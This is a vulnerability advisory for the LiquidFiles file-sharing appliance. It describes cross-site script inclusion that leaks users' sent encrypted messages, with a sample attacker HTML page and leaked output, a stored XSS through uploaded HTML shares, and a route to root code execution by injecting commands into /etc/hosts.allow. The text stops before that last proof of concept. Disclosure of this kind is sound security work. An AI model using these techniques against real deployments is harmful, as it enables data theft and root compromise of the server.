LiquidFiles 1 is a Virtual Appliance that helps Companies and Organizations Send, Receive & Share Large Files, Fast & Securely.
Vulnerabilities were found in LiquidFiles V.A. which exploit the way it renders user content. Targeting a logged-in user would allow malicious users to perform client-side attacks. The impact of this ranges from executing commands as root on the server to retrieving sensitive information about encrypted e-mails, depending on the permissions of the user targeted. It should be noted that client-side interaction is mandatory for these attacks to succeed (e.g. accessing an attacker-controlled website).
This vulnerability was discovered and researched by Leandro Barragan.
For example, the following URL returns all the sent e-mails:
$("#messages").html('<thead>\n <tr>\n <th>ID<\/th>\n <th><a href=\"/messages/sent?direction=asc&sort=recipients\">Recipients<\/a><\/th>\n <th><a href=\"/messages/sent?direction=asc&sort=subject\">Subject<\/a><\/th>\n <th>Filename<\/th>\n <th><a href=\"/messages/sent?direction=asc&sort=size\">Size<\/a><\/th>\n <th><a class=\"current desc\" href=\"/messages/sent?direction=asc&sort=messages.created_at\">Sent<\/a><\/th>\n <th><a href=\"/messages/sent?direction=asc&sort=messages.expires_at\">Expires<\/a><\/th>\n <th class=\"center\"><a href=\"/messages/sent?direction=asc&sort=downloads\">Downloads<\/a><\/th>\n <th>Action<\/th>\n <\/tr>\n<\/thead>\n<tbody>\n <tr>\n <td class=\"id-column\">fFAfVtDezDDAbhEjhlXGuE<\/td>\n <td class=\"recipients_column\">firstname.lastname@example.org<\/td>\n <td class=\"subject_column\">Test<\/td>\n <td class=\"download_column wrap\"><\/td>\n <td class=\"nowrap\">0 Bytes<\/td>\n\n <td class=\"expires_column nowrap\">12 Dec, 2019 18:14<\/td>\n <td class=\"expires_column nowrap\">11 Jan, 2020<\/td>\n <td class=\"downloads_column center\">\n 0\n <\/td>\n <td class=\"actions_column nowrap\">\n <ul class=\"nav nav-pills\">\n <li class=\"dropdown\"><a class=\"dropdown-toggle\" data-toggle=\"dropdown\" href=\"#\"><b class=\"caret\"><\/b><\/a>\n <ul class=\"dropdown-menu dropdown-menu-right\">\n <li><a data-toggle=\"modal\" data-target=\"#message_modal\" data-cache=\"false\" href=\"/message/fFAfVtDezDDAbhEjhlXGuE/popup\">View Message (Popup)<\/a><\/li>\n <li><a href=\"/message/fFAfVtDezDDAbhEjhlXGuE\">View Message<\/a><\/li> [...SNIPPED...]
An attacker could embed that endpoint in its own website in order to access the information about the encrypted messages a user sent in the past:
<html> <head><script src="https://code.jquery.com/jquery-3.4.1.js"></script></head> <body> <div id="messages" class="messages"></div> <script src="https://server/messages/sent?format=js"></script> </body> </html>
After obtaining the IDs of the sent messages, its contents can also be disclosed by including the following URL:
This issue is not limited to the previously mentioned endpoints, approximately 109 ERB views were found to be vulnerable to this issue.
[CVE-2020-29071] A Cross-Site Scripting issue was found which can be exploited by uploading HTML files using the "Shares" feature.
Leveraging this behavior, it is possible to obtain code execution as root on the appliance by targeting users with "Sysadmin" privileges. LiquidFiles offers a way to set a password in order to log into the appliance via SSH. This password can only be set on the first login, and then it can not be changed using the web interface. Given that this is not always the case, this option is nonideal.
Another method exists to achieve code execution. The "Access Control" setting on the UI embeds the user input verbatim on
/etc/hosts.allow. By leveraging TCP Wrappers ability to execute commands, an attacker can send a specially crafted "Allowed Hosts" list which would execute arbitrary commands as root after any other user tries to connect to the SSH Daemon running on the server. A proof of concept document for this is provided below: